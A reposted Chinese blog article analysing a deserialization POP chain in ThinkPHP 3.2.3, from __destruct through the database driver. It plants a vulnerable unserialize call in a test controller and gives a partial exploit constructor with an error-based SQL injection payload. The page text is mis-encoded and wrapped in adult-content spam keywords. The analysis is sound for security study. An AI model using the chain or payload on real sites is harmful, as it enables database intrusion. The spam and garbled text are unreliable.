日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術(shù)文章
文章詳情頁

Thinkphp3.2.3反序列化漏洞實(shí)例分析

瀏覽:231日期:2022-06-06 15:16:40
目錄
  • 前言
  • 魔術(shù)方法
  • 復(fù)現(xiàn)
  • 結(jié)語

前言

ThinkPHP,是為了簡化企業(yè)級應(yīng)用開發(fā)和敏捷WEB應(yīng)用開發(fā)而誕生的開源輕量級PHP框架。隨著框架代碼量的增加,一些潛在的威脅也逐漸暴露,本文給大家?guī)淼氖菍hinkphp3.2.3版本框架里面的反序列化漏洞進(jìn)行分析,淺談原理以及如何應(yīng)用。

魔術(shù)方法

因?yàn)橹耙呀?jīng)講過了,這里就簡單提一下,以下面這個(gè)魔術(shù)方法為例:

_destruct

該方法的作用是,某個(gè)對象的所有引用都被刪除或者當(dāng)對象被顯式銷毀時(shí)執(zhí)行。例如下面代碼:

<?phpclass User{    public function __destruct()    {echo "xino</br>";    }}$test = new User();$ser = serialize($test);unserialize($ser);?>

執(zhí)行后會(huì)發(fā)現(xiàn)調(diào)用了魔術(shù)方法,我們要想辦法來尋找代碼之間的關(guān)系來構(gòu)造 反序列化鏈,常見魔術(shù)方法如下:

了解完魔術(shù)方法如何觸發(fā)后便開始我們TP3反序列化漏洞的學(xué)習(xí)之旅。

復(fù)現(xiàn)

這里我是用小皮面板搭建好環(huán)境后開始我們的分析,下面是主界面:

需要在控制器IndexController.class.php 處寫入:

public function index(){    unserialize(base64_decode($_GET[1]));}

首先走到Library/Think/Image/Driver/Imagick.class.php ,代碼如下:

 public function __destruct()    {empty($this->img) || $this->img->destroy();    }}

這里有一個(gè)可控的變量img,因?yàn)樵撟兞孔呦蛄薲estory(),于是我們尋找一下:

Library/Think/Session/Driver/Memcache.class.php ,該處有個(gè)一樣的方法:

 public function destroy($sessID)    {return $this->handle->delete($this->sessionName . $sessID);    }

我們會(huì)發(fā)現(xiàn)handle和sessionName參數(shù)是可控,因?yàn)樽呦蛄薲elete函數(shù),于是繼續(xù)跟進(jìn)尋找delete,在Mode/Lite/Model.class.php 處:

   public function delete($options = array())    {$pk = $this->getPk();if (empty($options) && empty($this->options["where"])) {    // 如果刪除條件為空 則刪除當(dāng)前數(shù)據(jù)對象所對應(yīng)的記錄    if (!empty($this->data) && isset($this->data[$pk])) {return $this->delete($this->data[$pk]);    } else {return false;    }}if (is_numeric($options) || is_string($options)) {    // 根據(jù)主鍵刪除記錄    if (strpos($options, ",")) {$where[$pk] = array("IN", $options);    } else {$where[$pk] = $options;    }    $options  = array();    $options["where"] = $where;}// 根據(jù)復(fù)合主鍵刪除記錄if (is_array($options) && (count($options) > 0) && is_array($pk)) {    $count = 0;    foreach (array_keys($options) as $key) {if (is_int($key)) {    $count++;}    }    if (count($pk) == $count) {$i = 0;foreach ($pk as $field) {    $where[$field] = $options[$i];    unset($options[$i++]);}$options["where"] = $where;    } else {return false;    }}// 分析表達(dá)式$options = $this->_parseOptions($options);if (empty($options["where"])) {    // 如果條件為空 不進(jìn)行刪除操作 除非設(shè)置 1=1    return false;}if (is_array($options["where"]) && isset($options["where"][$pk])) {    $pkValue = $options["where"][$pk];}if (false === $this->_before_delete($options)) {    return false;}$result = $this->db->delete($options);		//數(shù)據(jù)庫驅(qū)動(dòng)類中的delete()if (false !== $result && is_numeric($result)) {    $data = array();    if (isset($pkValue)) {$data[$pk] = $pkValue;    }    $this->_after_delete($data, $options);}// 返回刪除記錄個(gè)數(shù)return $result;    }

這里比較復(fù)雜,需要分析一下,pk,pk,pk,data,$options參數(shù)都是可控的,第二次調(diào)用該函數(shù)后是調(diào)用db(Library/Think/Db/Driver.class.php )里面的函數(shù),進(jìn)去看一下:

$table = $this-&gt;parseTable($options["table"]);$sql   = "DELETE FROM " . $table;return $this-&gt;execute($sql, !empty($options["fetch_sql"]) ? true : false);

這里只貼了比較關(guān)鍵的代碼,看到table經(jīng)過parseTable處理之后進(jìn)了sql語句,跟進(jìn)了發(fā)現(xiàn)沒有過濾什么,直接返回了數(shù)據(jù),最后調(diào)用了execute,我們分析其代碼:

 public function execute($str,$fetchSql=false) {$this->initConnect(true);if ( !$this->_linkID ) return false;$this->queryStr = $str;if(!empty($this->bind)){    $that   =   $this;    $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return """.$that->escapeString($val)."""; },$this->bind));}if($fetchSql){    return $this->queryStr;}

看到第二行是一個(gè)初始化連接的代碼,我們跟進(jìn)到最后發(fā)現(xiàn):

 public function connect($config = "", $linkNum = 0, $autoConnection = false)    {if (!isset($this->linkID[$linkNum])) {    if (empty($config)) {$config = $this->config;    }    try {if (empty($config["dsn"])) {    $config["dsn"] = $this->parseDsn($config);}if (version_compare(PHP_VERSION, "5.3.6", "<=")) {    // 禁用模擬預(yù)處理語句    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;}$this->linkID[$linkNum] = new PDO($config["dsn"], $config["username"], $config["password"], $this->options);    } catch (\PDOException $e) {if ($autoConnection) {    trace($e->getMessage(), "", "ERR");    return $this->connect($autoConnection, $linkNum);} elseif ($config["debug"]) {    E($e->getMessage());}    }}return $this->linkID[$linkNum];    }

可以通過里面的相應(yīng)代碼:

$this->config

建立數(shù)據(jù)庫連接,整個(gè)的POP鏈跟進(jìn)順序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因?yàn)闃?gòu)造poc較長,這里只貼關(guān)鍵處,有興趣的小伙伴可以自行去構(gòu)造:

  public function __construct(){    $this->db = new Mysql();    $this->options["where"] = "";    $this->pk = "id";    $this->data[$this->pk] = array("table" => "name where 1=updatexml(1,user(),1)#","where" => "1=1"    ); }

生成后傳入payload即可實(shí)現(xiàn)錯(cuò)報(bào)注入,體現(xiàn)在payload里就是table這個(gè)語句,經(jīng)過一串的操作使之與數(shù)據(jù)庫連接來執(zhí)行sql語句:

結(jié)語

給大家?guī)砹藅p3的反序列化漏洞分析,主要還是要理清各個(gè)鏈的關(guān)系以及如何讓它們聯(lián)系起來,有興趣的小伙伴可以自己去搭建嘗試,喜歡本文的小伙伴希望可以一鍵三連支持一下。

以上就是Thinkphp3.2.3反序列化漏洞實(shí)例分析的詳細(xì)內(nèi)容,更多關(guān)于Thinkphp 反序列化漏洞的資料請關(guān)注其它相關(guān)文章!

標(biāo)簽: PHP
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
亚洲www免费| 欧美日韩免费观看一区=区三区| 久久久国产精品一区二区中文| 欧美国产中文高清| 国产精品视频一区二区三区综合 | 精品国产免费人成网站| 高潮久久久久久久久久久久久久| 免费在线亚洲欧美| 精品国产精品国产偷麻豆| 久久精品九色| 精品三级av| 久久久精品国产**网站| 国产福利亚洲| 精品亚洲自拍| 国产亚洲一区二区手机在线观看| 蜜桃国内精品久久久久软件9| 国产精品人人爽人人做我的可爱| 亚洲免费中文| 国产欧美视频在线| 国内不卡的一区二区三区中文字幕| 美女av在线免费看| 亚洲欧美日韩精品一区二区| 亚洲1区在线| 岛国精品一区| 国产美女精品| 美女在线视频一区| 韩日一区二区| 日韩视频不卡| 国产精品久久久久av蜜臀| 91日韩免费| 丝袜美腿亚洲一区二区图片| 久久精品免视看国产成人| 伊人影院久久| 麻豆91小视频| 天使萌一区二区三区免费观看| 国产伦精品一区二区三区千人斩 | 精品久久久中文字幕| 亚洲五月婷婷| 欧美激情麻豆| 免费看欧美美女黄的网站| 久久精品国产在热久久| 亚洲另类视频| 久久国产成人午夜av影院宅| 国产精品一区二区三区美女| 国产精品日本| 伊人精品一区| 精品国产欧美日韩一区二区三区| 综合国产视频| 欧美日韩国产欧| 成人日韩在线| 88久久精品| 六月丁香综合| 久久久精品久久久久久96 | 91偷拍一区二区三区精品| 麻豆9191精品国产| 91精品一区二区三区综合| 精品一区二区三区中文字幕视频| 日韩一二三区在线观看| 亚洲永久字幕| 国产亚洲精品v| 亚洲少妇诱惑| 婷婷亚洲五月| 久久国产直播| 在线一区av| 日韩综合在线| 亚洲性色av| 91欧美在线| 日韩一区亚洲二区| av高清不卡| 日韩福利一区| 成人精品中文字幕| 久久国产精品成人免费观看的软件| 日韩电影免费网址| 久久婷婷一区| 婷婷亚洲五月| 日本不卡视频一二三区| 日韩中文av| 国产欧美一区二区三区精品观看| 欧美三区不卡| 鲁大师精品99久久久| a国产在线视频| 中文字幕系列一区| 亚洲v在线看| 中国女人久久久| 欧美一区久久| 日韩欧美一区二区三区免费看| 欧美日韩一二三四| 亚洲一区有码| 国产不卡一区| 欧美日韩国产亚洲一区| 亚洲精品婷婷| 久久99视频| 激情六月综合| 日本午夜精品久久久久| 色爱综合网欧美| 91久久在线| 精品国产午夜肉伦伦影院| 136国产福利精品导航网址| 亚洲综合激情在线| 日本不卡免费高清视频在线| 久久电影一区| 亚洲性色av| 国产精品手机在线播放| re久久精品视频| 国产精品视频一区二区三区四蜜臂| 国产中文在线播放| 日本不卡高清视频| 日韩欧美精品| 久久精品一区| 亚洲另类黄色| 黄色国产精品| 日韩精品专区| 欧美激情 亚洲a∨综合| 蜜臀av性久久久久蜜臀aⅴ四虎| 成人精品国产亚洲| 日韩高清电影一区| 国产亚洲精品v| 日本韩国欧美超级黄在线观看| 欧美一区二区三区久久| 美美哒免费高清在线观看视频一区二区 | 久久精品 人人爱| 国产一区二区精品| 日韩视频一区二区三区在线播放免费观看| 久久免费影院| 国产精品videossex| 涩涩涩久久久成人精品| 亚洲一区二区动漫| 亚洲成人三区| 欧美亚洲国产精品久久| 日韩欧美在线中字| 国产美女高潮在线| 日韩成人精品一区| 福利视频一区| 五月激情久久| av免费不卡国产观看| 精品日本视频| 久久永久免费| 麻豆精品久久| 麻豆成全视频免费观看在线看| 电影91久久久| 久久精品影视| 视频一区欧美精品| 日本成人中文字幕在线视频| 婷婷精品在线观看| 久久国产精品免费一区二区三区| 国产欧美另类| 欧美sss在线视频| 国产精品日本| 国产精品高清一区二区| 国产精品乱战久久久| 麻豆网站免费在线观看| 尤物在线精品| 日本成人在线网站| 国产一区二区三区四区五区| 四虎4545www国产精品| 免播放器亚洲| 九九久久国产| 亚洲欧美日韩精品一区二区| 国产亚洲精品美女久久久久久久久久| 精品中文字幕一区二区三区四区| 日韩欧美少妇| 四虎精品一区二区免费| 国产在视频一区二区三区吞精| 黄色不卡一区| 911亚洲精品| 91精品国产福利在线观看麻豆| 综合一区av| 热三久草你在线| 日本中文字幕视频一区| 日韩欧美精品综合| 日韩激情中文字幕| 日韩中文首页| 欧美日韩一区二区三区不卡视频| 三级精品视频| 美女久久精品| 午夜精品影视国产一区在线麻豆| 国产传媒在线观看| 国产精品亚洲综合久久| 国产日韩专区| 久久久亚洲一区| 国产欧美视频在线| 在线观看一区| 日韩一级欧洲| 久久伦理在线| 成人在线视频中文字幕| 国产精品成人3p一区二区三区| 免费在线观看不卡| 免费在线观看一区二区三区| 色爱av综合网| 日韩精品专区| 黄色在线网站噜噜噜| 国模大尺度视频一区二区| 国产精品天堂蜜av在线播放| 日韩高清欧美激情| 综合欧美亚洲| 综合激情在线| 亚洲人成网77777色在线播放| 午夜在线精品偷拍| 日韩一区精品字幕| 中文字幕av一区二区三区人|